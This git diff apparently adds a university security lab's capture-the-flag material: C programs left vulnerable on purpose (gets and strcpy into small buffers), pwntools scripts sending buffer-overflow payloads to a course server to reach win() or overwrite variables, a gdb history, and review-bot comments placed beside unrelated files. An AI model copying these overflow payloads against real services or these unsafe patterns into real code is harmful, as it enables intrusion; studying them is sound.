diff --git a/pa/lab6/.gdb_history b/pa/lab6/.gdb_history
new file mode 100644
index 0000000..1397fad
--- /dev/null
+++ b/pa/lab6/.gdb_history
@@ -0,0 +1,119 @@
+disas main
+disas win
+disas main
+q
+disas challenge
+disas win
+q
+disas challenge
+q
+p /x &buffer
+disas challenge
+q
+disas challenge
+q
+q
+disas main
+disas check_password
+q
+disas check_password
+q
+q
+disas check_password
+q
+disas check_password
+q
+disassemble challenge
+q
+disas check_password
+q
+disas main
+q
+disas main
+disas check_password
+q
+b main
+r
+b check_password
+c
+stack 50
+disas check_
+disas check_password
+r
+a
+c
+disas check_password
+b 0x08048731
+b *0x08048731
+r
+c
+p /x $ebx
+c
+stack 50
+q
+disas main
+q
+disas check_password
+q
+b *0x08048731
+r
+si
+stack 50
+q
+b *0x08048731
+r
+p $ebp
+q
+attach 103318
+b *0x08048731
+c
+stack 50
+b *(0x804874d+5)
+c
+stack 50
+q
+attach 104773
+disas check_
+disas check_password
+b *0x08048738
+c
+b * 0x8048752
+stack 30
+c
+stack 30
+q
+attach 106286
+disas check_password
+b *0x08048735
+p *0x08048752
+b *0x08048752
+c
+si
+stack 50
+q
+attach 107369
+b *0x08048735
+b *0x08048752
+c
+si
+stack 30
+c
+si
+stack 30
+c
+q
+attach 111389
+b *0x08048752
+b *0x08048735
+c
+stack 30
+si
+stack 30
+next
+stack 20
+i
+if
+i f
+stack
+disas check_password
+q
diff --git a/pa/lab6/chall_calling_functions.py b/pa/lab6/chall_calling_functions.py
new file mode 100644
index 0000000..1bf8a16
--- /dev/null
+++ b/pa/lab6/chall_calling_functions.py
@@ -0,0 +1,12 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25153
+
+WIN_ADDR = 0x080486f1
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("?\n")
+conn.send(b"\x55"*32 + b"\xf1\x86\x04\x08\n")
+conn.interactive()
diff --git a/pa/lab6/chall_match_an_exact_value.py b/pa/lab6/chall_match_an_exact_value.py
new file mode 100644
index 0000000..fa4088e
--- /dev/null
+++ b/pa/lab6/chall_match_an_exact_value.py
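Review bot: `conn.recvuntil("?\n")` passes a str where pwntools on Python 3 works in bytes; current pwntools still accepts it but emits a BytesWarning and assumes ASCII, so the delimiter should be written `b"?\n"`. The same str delimiter appears in chall_match_an_exact_value.py, chall_return_address.py and chall_simple_overflow.py in this commit. `WIN_ADDR = 0x080486f1` is defined but never read: the send line hand-encodes the same value as `b"\xf1\x86\x04\x08"`, whereas chall_super_secure_system.py already uses `p32(...)` for this, so `conn.send(b"\x55"*32 + p32(WIN_ADDR) + b"\n")` keeps constant and payload in sync (chall_return_address.py has the same unused constant).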
@@ -0,0 +1,10 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25152
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("?\n")
+conn.send(b"\x55"*64 + b"dcba\n")
+conn.interactive()
diff --git a/pa/lab6/chall_return_address.py b/pa/lab6/chall_return_address.py
new file mode 100644
index 0000000..ffbf47e
--- /dev/null
+++ b/pa/lab6/chall_return_address.py
@@ -0,0 +1,12 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25154
+
+WIN_ADDR = 0x080486f1
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("'\n")
+conn.send(b"\x55"*0x12 + b"\xaa"*4 + b"\xf1\x86\x04\x08\n")
+conn.interactive()
diff --git a/pa/lab6/chall_simple_overflow.py b/pa/lab6/chall_simple_overflow.py
new file mode 100644
index 0000000..cb99bd9
--- /dev/null
+++ b/pa/lab6/chall_simple_overflow.py
@@ -0,0 +1,10 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25151
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("0.\n")
+conn.send(b"\x55"*128 + b"\x01\n")
+conn.interactive()
diff --git a/pa/lab6/chall_super_secure_system.py b/pa/lab6/chall_super_secure_system.py
new file mode 100644
index 0000000..e987988
--- /dev/null
+++ b/pa/lab6/chall_super_secure_system.py
@@ -0,0 +1,15 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25155
+
+WIN_ADDR = p32(0x080487d9)
+EBX = p32(0x804a001) # Has NULL byte
+EBP = p32(0xffffcdd8)
+
+#conn = process("./check")
+conn = remote(HOST, PORT)
+pl = b"\x55"*0x24 + EBX + EBP + WIN_ADDR
+input()
+conn.send(pl)
+conn.interactive()
diff --git a/pa/lab6/check b/pa/lab6/check
new file mode 100755
index 0000000..002c2eb
Binary files /dev/null and b/pa/lab6/check differ
diff --git a/pa/lab6/check.c b/pa/lab6/check.c
new file mode 100644
index 0000000..969ebcb
--- /dev/null
+++ b/pa/lab6/check.c
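Review bot: The bare `input()` before `conn.send(pl)` blocks with no prompt and nothing in the file says why; given the commented-out `process("./check")` line and the `attach <pid>` entries in the .gdb_history added by this commit, it is presumably a pause for attaching a debugger, so it should either carry a prompt, `input("attach a debugger to the target, then press Enter")`, or be dropped for the remote run. `EBP = p32(0xffffcdd8)` appears to be an absolute stack address measured in one particular environment; a comment recording where it was observed would help, because the value will not hold elsewhere and the script gives no hint of that. The commented-out `process` line is dead code and should be removed or replaced by a local/remote switch.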
@@ -0,0 +1,30 @@
+#include
+#include
+#include
+#include
+#include "general.h"
+
+int check_password(char* password) {
+ char buffer[32];
+
+ strcpy(buffer, password);
+
+ if(strcmp(buffer, getflag()) == 0)
+ return 1;
+
+ return 0;
+}
+
+int main() {
+ init();
+
+ char pass[64] = {0};
+ // we know how to make this secure. No gets in here.
+ read(0, pass, 63);
+
+ if(check_password(pass)){
+ printf("Welcome back! Here is the secret flag that you already knew: %s\n", getflag());
+ } else {
+ printf("Unauthorized user/passwd\n");
+ }
+}
diff --git a/pa/lab6/functions b/pa/lab6/functions
new file mode 100644
index 0000000..0ad9bfb
Binary files /dev/null and b/pa/lab6/functions differ
diff --git a/pa/lab6/functions.c b/pa/lab6/functions.c
new file mode 100644
index 0000000..9603c36
--- /dev/null
+++ b/pa/lab6/functions.c
@@ -0,0 +1,27 @@
+#include
+#include
+#include
+#include
+#include "general.h"
+
+void win() {
+ printf("Congratulations, you win!!! You successfully changed the code flow\n");
+ printf("Flag: %s\n", getflag());
+}
+
+int main() {
+ init();
+ int (*fp)();
+ char buffer[32];
+
+ fp = 0;
+
+ printf("You win this game if you are able to call the function win. Can you do it?\n");
+
+ gets(buffer);
+
+ if(fp) {
+ printf("Calling function pointer... jumping to %p\n", fp);
+ fp();
+ }
+}
diff --git a/pa/lab6/match.c b/pa/lab6/match.c
new file mode 100644
index 0000000..c81ef9f
--- /dev/null
+++ b/pa/lab6/match.c
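Review bot: The comment `// we know how to make this secure. No gets in here.` in main is misleading: bounding `read(0, pass, 63)` protects `pass`, but `check_password` then does `strcpy(buffer, password)` into a 32-byte `buffer` from a string that may be up to 63 bytes, so the unbounded copy has only moved into the callee. The copy is unnecessary — comparing the argument directly, `if(strcmp(password, getflag()) == 0)`, removes the overflow — or `buffer` must be at least `sizeof pass`. If the weakness is intentional for the lab, the comment should say that rather than claim the code is secure.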
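Review bot: `gets(buffer)` reads into the 32-byte `buffer` with no length bound; `gets` was removed from the C standard in C11 and the bounded replacement is `fgets(buffer, sizeof buffer, stdin)`. match.c, return.c and simple.c in this commit use `gets` the same way. Separately, `printf("Calling function pointer... jumping to %p\n", fp)` hands a function pointer to `%p`, which expects `void *`; `(void *)fp` keeps the call well-defined.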
@@ -0,0 +1,24 @@
+#include
+#include
+#include
+#include
+#include
+#include "general.h"
+
+int main() {
+ init();
+ int test;
+ char buffer[64];
+
+ printf("You win this game if you can change variable test to the value 0x61626364. Have you noticed that the ascii code of 'a' is 0x61?\n");
+
+ test = 0;
+ gets(buffer);
+
+ if (test == 0x61626364) {
+ printf("Congratulations, you win!!! You correctly got the variable to the right value\n");
+ printf("Flag: %s\n", getflag());
+ } else {
+ printf("Try again, you got 0x%08x, instead of 0x61626364\n", test);
+ }
+}
diff --git a/pa/lab6/return b/pa/lab6/return
new file mode 100644
index 0000000..b6e2617
Binary files /dev/null and b/pa/lab6/return differ
diff --git a/pa/lab6/return.c b/pa/lab6/return.c
new file mode 100644
index 0000000..2297db0
--- /dev/null
+++ b/pa/lab6/return.c
@@ -0,0 +1,22 @@
+#include
+#include
+#include
+#include
+#include "general.h"
+
+void win() {
+ printf("Congratulations, you win!!! You successfully changed the code flow\n");
+ printf("Flag, %s\n", getflag());
+}
+
+void challenge() {
+ char buffer[10];
+ printf("You win this game if you are able to call the function win.'\n");
+ gets(buffer);
+}
+
+int main() {
+ init();
+ challenge();
+ return 0;
+}
diff --git a/pa/lab6/simple b/pa/lab6/simple
new file mode 100755
index 0000000..99a5b92
Binary files /dev/null and b/pa/lab6/simple differ
diff --git a/pa/lab6/simple.c b/pa/lab6/simple.c
new file mode 100644
index 0000000..f3d81d4
--- /dev/null
+++ b/pa/lab6/simple.c
@@ -0,0 +1,23 @@
+#include
+#include
+#include
+#include
+#include "general.h"
+
+int main() {
+ init();
+ int test;
+ char buffer[128];
+
+ printf("You win this game if you change variable test to a value different from 0.\n");
+
+ test = 0;
+ gets(buffer);
+
+ if(test != 0) {
+ printf("YOU WIN!\n");
+ printf("Flag: %s\n", getflag());
+ } else {
+ printf("Try again...\n");
+ }
+}
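Review bot: In return.c, `win` prints `"Flag, %s\n"` while every other challenge in this commit prints `"Flag: %s\n"`, and the prompt in `challenge` ends with a stray `'` before the newline; both read as typos. Note that chall_return_address.py's `recvuntil("'\n")` keys on that stray quote, so if the prompt is ever corrected the script's delimiter must change with it — a comment in the script pointing at this dependency would save a confusing hang.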